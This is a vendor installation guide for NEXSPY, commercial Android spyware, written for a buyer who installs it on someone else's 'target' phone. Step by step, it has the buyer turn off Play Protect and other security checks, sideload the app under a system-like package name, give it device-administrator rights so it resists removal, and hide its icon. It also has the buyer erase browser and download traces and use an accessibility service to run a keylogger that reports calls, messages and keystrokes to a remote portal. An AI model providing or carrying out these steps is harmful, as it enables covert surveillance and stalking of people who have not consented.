Part 1: Get your license and login to your account

To monitor an Android phone or tablet, you will need a NEXSPY Premium license. With over 50 powerful features include call logs, text messages, instant messages, web history and so much more, it will satisfy all your monitoring needs.

It is best to use an authentic email address as it will be used to receive your login credentials after purchase.

After completing your purchase, keep an eye on your inbox for the email that contains your login credentials which will arrive shortly.

With the provided credentials, log in to your account at https://my.nexspy.com using any web browser. There you will have full control over your account details, license information, manuals and documentation.

The portal may seem a bit simple at first, but do not worry, it will become more lively once you finished installing the app on a target device.

Right now, pay attention to the menu on the left. You'll have the Help menu which contains all the manuals and documentation about NEXSPY for your reference. The Account menu is where your account information, and most importantly - your License Key are displayed.

Part 2: Install NEXSPY on the target Android device

First, make sure that your target Android phone or tablet is running a compatible Android version. Check the compatibility list to see if your target device is compatible.

You won't need to root the target Android phone or tablet. However, some advanced features require rooting the device before installing NEXSPY in order to work. If you don't need these advanced features, then you don't have to worry about that.

 Important ☆ The installation process must be done on the target phone or tablet that you want to monitor.

PREREQUISITES (NON-ROOTED VERSION)

1. Disable Security Settings

From the Apps drawer, tap on Google Settings > Security. Under Verify Apps, turn off all options.

For Android OS 8 and above, go to Settings > Google/Google Settings > Security > Google Play Protect/Play Protect settings and make sure Scan device for security threats is disable.

2. Enable Unknown Sources

Go to Apps > Settings > Lock Screen & Security and make sure Unknown Sources is enabled.

For Android OS 8 and above, go to Settings, search for Install unknown apps and tap on the browser that you will be using for download software. For example: if you are using Chrome for download, tap Chrome and enable Allow from this source.

​3. (Samsung only) Disable Device Security

Go to Settings > Apps, tap three dot icon on the top right, then tap Show system apps > Device security > Storage > Clear data > Delete

Go to Settings > Lock screen and security and make sure App permission monitor is disabled

For Android OS 9, go to Settings > Device care and make sure Security is deactivated

​4. Disable Google Play Store Notifications

This is to avoid warnings which may otherwise randomly appear. Disabling Notifications does not disable Play Store or prevent normal app updates.

For OS 9: Go to Settings > Notifications (click “see all”) > Google Play Store, and tap the slider to disable it. Tap on Google Play Store to open the menu and confirm Notification are disabled.

For OS 8 and below, go to Settings > Apps & Notifications > Notifications (scroll down to Google Play Store), and tap the slider so it reads “Off”.

☆ Important 

Some devices may have slightly different navigation to the Notifications menu.

INSTALL THE SOFTWARE (NON-ROOTED VERSION)

​1. Download the Application

On the target phone, open up a browser and navigate to the website https://dmw.bz. At the Private Software Repository screen, add a check in the box for “I am a customer and I have a license code”, then tap View all software. Tap on the ANDROID icon to start the download. Once the download has completed tap the file to begin installation.

​2. Software Installation

Tap Next, then tap Install. Once installation has completed, tap Open when the option appears.

☆ Important ☆

If you cannot tap Open and can only tap Done, this indicates the software is already installed. If you are reinstalling the software, you must first uninstall the previous version.


To uninstall the previous version, go to Settings > Application Manager > com.android.system.service or sync services (for software version 4.0.3 and above) and tap Uninstall. We recommend restarting the phone after uninstalling. You may then start a new installation.

​3. Accept Installation Terms

Tick Accept license agreement to continue and tap Continue.

​4. SIM Card Support

If a SIM card is not already inserted, phones running Android OS 4.x may see a message to Insert Sim Card. For dual SIM phone models, only a single SIM card can be fully supported. If you see this screen please turn the phone off to insert a SIM card, and then restart from the beginning.

​5. Activate Device Administrator

For non-rooted Android devices that cannot have root permissions granted to the application, activate Device Administrator for the application. This grants the software additional local permissions making it more secure and less likely to be uninstalled. Tap Activate to continue.

​6. Battery Optimization

Tap Allow to let the software continuously run in the background without being terminated.

​7. Activation Code & Visibility

Enter your license code and tap Activate. Please wait as the software activates. You will then be asked to set your software visibile or invisible. Tap Yes to hide the software icon, or tab No to keep it visible in the App Drawer.

Congratulations! You have now completed the software installation, however to remove traces of the installation, please follow the steps below.

​8. Clear Browser

In the phone browser you used in Step 1, you can delete the browser URL history. Tap the browser menu button and then tap Settings > Privacy > Delete Personal Data. Make sure the options for Browser History, Cache, and Cookies and Site Data are selected, then tap Delete.

​9. Clear Download History

To delete the downloaded file, press the Home button to return to the app list, and choose the My Files browser. Tap Download History. Select the downloaded file, then tap the Trash icon to delete the installation file from the phone. Tap Delete to confirm.

​10. Enable Large keyboard text (or Magnify keyboard text on some device)

Go to Settings > Advanced settings > Accessibility, scroll down to Services and make sure Large keyboard text (or Magnify keyboard text) is enable.

For Android OS 9, go to Settings > Accessibility > Installed services and make sure Large keyboard text (or Magnify keyboard text) is enabled.

☆ Important ☆

This step is crucial for Keylogger to work. If you find that keylogger is not working properly, please redo this step.

• Re-authentication must not be checked
• Default access must be changed to Grant
• Show notifications must not be checked

If you use Magisk for rooting, tap Settings icon on the device, go to Apps & Notifications > Magisk Manager and toggle the top option to Off.

INSTALL THE SOFTWARE (ROOTED VERSION)

Not all phones will be able to obtain Full permissions mode, which is required for some features to run properly.

Part 3: View monitored data from your account portal

Once the installation on the target phone or tablet is completed, you may start viewing its monitored data.

To do that, simply login to your account portal. You can always access it online at https://my.nexspy.com using any web browser from anywhere.

You will notice that your account has changed a bit, the menu on the left is now listing all supported features of your license. Feel free to explore yourself. And if you ever need something, just go to the Help menu at the top to find your answer.

Please note that it usually takes several minutes to sync all data from the monitored device for the first time. If the monitored Android is not connected to the Internet, NEXSPY server will not be able to push any new data to your account.
